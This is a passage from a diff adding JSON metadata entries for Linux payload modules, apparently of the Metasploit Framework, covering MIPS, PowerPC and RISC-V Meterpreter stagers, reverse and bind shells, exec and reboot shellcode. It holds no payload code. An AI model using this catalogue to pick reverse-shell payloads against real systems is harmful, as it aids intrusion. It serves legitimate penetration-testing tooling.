TCP Inline", + "fullname": "payload/linux/mips64/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "mips64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/mips64/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/mipsbe/exec": { + "name": "Linux Execute Command", + "fullname": "payload/linux/mipsbe/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Michael Messner ", + "entropy " + ], + "description": "A very small shellcode for executing commands.\n This module is sometimes helpful for testing purposes.", + "references": [ + "EDB-17940" + ], + "platform": "Linux", + "arch": "mipsbe", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/mipsbe/exec.rb", + "is_install_path": true, + "ref_name": "linux/mipsbe/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/mipsbe/meterpreter/reverse_tcp": { + "name": "Linux Meterpreter, Reverse TCP Stager", + "fullname": "payload/linux/mipsbe/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "juan vazquez ", + "tkmru" + ], + "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "mipsbe", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/mipsbe/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/mipsbe/meterpreter", + "stager_refname": "linux/mipsbe/reverse_tcp" + }, + "payload_linux/mipsbe/meterpreter_reverse_http": { + "name": "Linux Meterpreter, Reverse HTTP Inline", + "fullname": "payload/linux/mipsbe/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "mipsbe", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb", + "is_install_path": true, + "ref_name": "linux/mipsbe/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/mipsbe/meterpreter_reverse_https": { + "name": "Linux Meterpreter, Reverse HTTPS Inline", + "fullname": "payload/linux/mipsbe/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "mipsbe", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb", + "is_install_path": true, + "ref_name": "linux/mipsbe/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/mipsbe/meterpreter_reverse_tcp": { + "name": "Linux Meterpreter, Reverse TCP Inline", + "fullname": "payload/linux/mipsbe/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "mipsbe", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/mipsbe/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/mipsbe/reboot": { + "name": "Linux Reboot", + "fullname": "payload/linux/mipsbe/reboot", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Michael Messner ", + "rigan - " + ], + "description": "A very small shellcode for rebooting the system.\n This payload is sometimes helpful for testing purposes or executing\n other payloads that rely on initial startup procedures.", + "references": [ + "URL-http://www.shell-storm.org/shellcode/files/shellcode-795.php" + ], + "platform": "Linux", + "arch": "mipsbe", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/mipsbe/reboot.rb", + "is_install_path": true, + "ref_name": "linux/mipsbe/reboot", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/mipsbe/shell/reverse_tcp": { + "name": "Linux Command Shell, Reverse TCP Stager", + "fullname": "payload/linux/mipsbe/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "juan vazquez ", + "tkmru" + ], + "description": "Spawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "mipsbe", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/mipsbe/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/mipsbe/shell", + "stager_refname": "linux/mipsbe/reverse_tcp" + }, + "payload_linux/mipsbe/shell_bind_tcp": { + "name": "Linux Command Shell, Bind TCP Inline", + "fullname": "payload/linux/mipsbe/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "scut", + "vaicebine", + "Vlatko Kosturjak", + "juan vazquez " + ], + "description": "Listen for a connection and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "mipsbe", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/mipsbe/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "linux/mipsbe/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/mipsbe/shell_reverse_tcp": { + "name": "Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/linux/mipsbe/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "rigan ", + "juan vazquez " + ], + "description": "Connect back to attacker and spawn a command shell", + "references": [ + "EDB-18226" + ], + "platform": "Linux", + "arch": "mipsbe", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/mipsbe/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/mipsle/exec": { + "name": "Linux Execute Command", + "fullname": "payload/linux/mipsle/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Michael Messner ", + "entropy " + ], + "description": "A very small shellcode for executing commands.\n This module is sometimes helpful for testing purposes as well as\n on targets with extremely limited buffer space.", + "references": [ + "EDB-17940" + ], + "platform": "Linux", + "arch": "mipsle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/mipsle/exec.rb", + "is_install_path": true, + "ref_name": "linux/mipsle/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/mipsle/meterpreter/reverse_tcp": { + "name": "Linux Meterpreter, Reverse TCP Stager", + "fullname": "payload/linux/mipsle/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "juan vazquez ", + "tkmru" + ], + "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "mipsle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/mipsle/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/mipsle/meterpreter", + "stager_refname": "linux/mipsle/reverse_tcp" + }, + "payload_linux/mipsle/meterpreter_reverse_http": { + "name": "Linux Meterpreter, Reverse HTTP Inline", + "fullname": "payload/linux/mipsle/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "mipsle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb", + "is_install_path": true, + "ref_name": "linux/mipsle/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/mipsle/meterpreter_reverse_https": { + "name": "Linux Meterpreter, Reverse HTTPS Inline", + "fullname": "payload/linux/mipsle/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "mipsle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb", + "is_install_path": true, + "ref_name": "linux/mipsle/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/mipsle/meterpreter_reverse_tcp": { + "name": "Linux Meterpreter, Reverse TCP Inline", + "fullname": "payload/linux/mipsle/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "mipsle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/mipsle/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/mipsle/reboot": { + "name": "Linux Reboot", + "fullname": "payload/linux/mipsle/reboot", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Michael Messner ", + "rigan - " + ], + "description": "A very small shellcode for rebooting the system.\n This payload is sometimes helpful for testing purposes.", + "references": [ + "URL-http://www.shell-storm.org/shellcode/files/shellcode-795.php" + ], + "platform": "Linux", + "arch": "mipsle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/mipsle/reboot.rb", + "is_install_path": true, + "ref_name": "linux/mipsle/reboot", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/mipsle/shell/reverse_tcp": { + "name": "Linux Command Shell, Reverse TCP Stager", + "fullname": "payload/linux/mipsle/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "juan vazquez ", + "tkmru" + ], + "description": "Spawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "mipsle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/mipsle/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/mipsle/shell", + "stager_refname": "linux/mipsle/reverse_tcp" + }, + "payload_linux/mipsle/shell_bind_tcp": { + "name": "Linux Command Shell, Bind TCP Inline", + "fullname": "payload/linux/mipsle/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "scut", + "vaicebine", + "Vlatko Kosturjak", + "juan vazquez " + ], + "description": "Listen for a connection and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "mipsle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "linux/mipsle/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/mipsle/shell_reverse_tcp": { + "name": "Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/linux/mipsle/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "rigan ", + "juan vazquez " + ], + "description": "Connect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "mipsle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/mipsle/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/ppc/meterpreter_reverse_http": { + "name": "Linux Meterpreter, Reverse HTTP Inline", + "fullname": "payload/linux/ppc/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "ppc", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb", + "is_install_path": true, + "ref_name": "linux/ppc/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/ppc/meterpreter_reverse_https": { + "name": "Linux Meterpreter, Reverse HTTPS Inline", + "fullname": "payload/linux/ppc/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "ppc", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb", + "is_install_path": true, + "ref_name": "linux/ppc/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/ppc/meterpreter_reverse_tcp": { + "name": "Linux Meterpreter, Reverse TCP Inline", + "fullname": "payload/linux/ppc/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "ppc", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/ppc/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/ppc/shell_bind_tcp": { + "name": "Linux Command Shell, Bind TCP Inline", + "fullname": "payload/linux/ppc/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ramon de C Valle " + ], + "description": "Listen for a connection and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "ppc, cbea", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/ppc/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "linux/ppc/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/ppc/shell_find_port": { + "name": "Linux Command Shell, Find Port Inline", + "fullname": "payload/linux/ppc/shell_find_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ramon de C Valle " + ], + "description": "Spawn a shell on an established connection", + "references": [], + "platform": "Linux", + "arch": "ppc, cbea", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/ppc/shell_find_port.rb", + "is_install_path": true, + "ref_name": "linux/ppc/shell_find_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/ppc/shell_reverse_tcp": { + "name": "Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/linux/ppc/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ramon de C Valle " + ], + "description": "Connect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "ppc, cbea", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/ppc/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/ppc64/shell_bind_tcp": { + "name": "Linux Command Shell, Bind TCP Inline", + "fullname": "payload/linux/ppc64/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ramon de C Valle " + ], + "description": "Listen for a connection and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "ppc64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "linux/ppc64/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/ppc64/shell_find_port": { + "name": "Linux Command Shell, Find Port Inline", + "fullname": "payload/linux/ppc64/shell_find_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ramon de C Valle " + ], + "description": "Spawn a shell on an established connection", + "references": [], + "platform": "Linux", + "arch": "ppc64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/ppc64/shell_find_port.rb", + "is_install_path": true, + "ref_name": "linux/ppc64/shell_find_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/ppc64/shell_reverse_tcp": { + "name": "Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/linux/ppc64/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ramon de C Valle " + ], + "description": "Connect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "ppc64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/ppc64/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/ppc64le/meterpreter_reverse_http": { + "name": "Linux Meterpreter, Reverse HTTP Inline", + "fullname": "payload/linux/ppc64le/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "ppc64le", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb", + "is_install_path": true, + "ref_name": "linux/ppc64le/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/ppc64le/meterpreter_reverse_https": { + "name": "Linux Meterpreter, Reverse HTTPS Inline", + "fullname": "payload/linux/ppc64le/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "ppc64le", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb", + "is_install_path": true, + "ref_name": "linux/ppc64le/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/ppc64le/meterpreter_reverse_tcp": { + "name": "Linux Meterpreter, Reverse TCP Inline", + "fullname": "payload/linux/ppc64le/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "ppc64le", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/ppc64le/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/ppce500v2/meterpreter_reverse_http": { + "name": "Linux Meterpreter, Reverse HTTP Inline", + "fullname": "payload/linux/ppce500v2/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "ppce500v2", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb", + "is_install_path": true, + "ref_name": "linux/ppce500v2/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/ppce500v2/meterpreter_reverse_https": { + "name": "Linux Meterpreter, Reverse HTTPS Inline", + "fullname": "payload/linux/ppce500v2/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "ppce500v2", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb", + "is_install_path": true, + "ref_name": "linux/ppce500v2/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/ppce500v2/meterpreter_reverse_tcp": { + "name": "Linux Meterpreter, Reverse TCP Inline", + "fullname": "payload/linux/ppce500v2/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "ppce500v2", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/ppce500v2/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/riscv32le/exec": { + "name": "Linux Execute Command", + "fullname": "payload/linux/riscv32le/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "modexp", + "bcoles " + ], + "description": "Execute an arbitrary command", + "references": [ + "URL-https://modexp.wordpress.com/2022/05/02/shellcode-risc-v-linux/", + "URL-https://github.com/odzhan/shellcode/blob/master/os/linux/riscv64/cmd.s" + ], + "platform": "Linux", + "arch": "riscv32le", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-14 09:31:03 +0000", + "path": "/modules/payloads/singles/linux/riscv32le/exec.rb", + "is_install_path": true, + "ref_name": "linux/riscv32le/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/riscv32le/reboot": { + "name": "Linux Reboot", + "fullname": "payload/linux/riscv32le/reboot", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bcoles " + ], + "description": "A very small shellcode for rebooting the system using\n the reboot syscall. This payload is sometimes helpful\n for testing purposes.", + "references": [], + "platform": "Linux", + "arch": "riscv32le", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-14 09:31:03 +0000", + "path": "/modules/payloads/singles/linux/riscv32le/reboot.rb", + "is_install_path": true, + "ref_name": "linux/riscv32le/reboot", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + 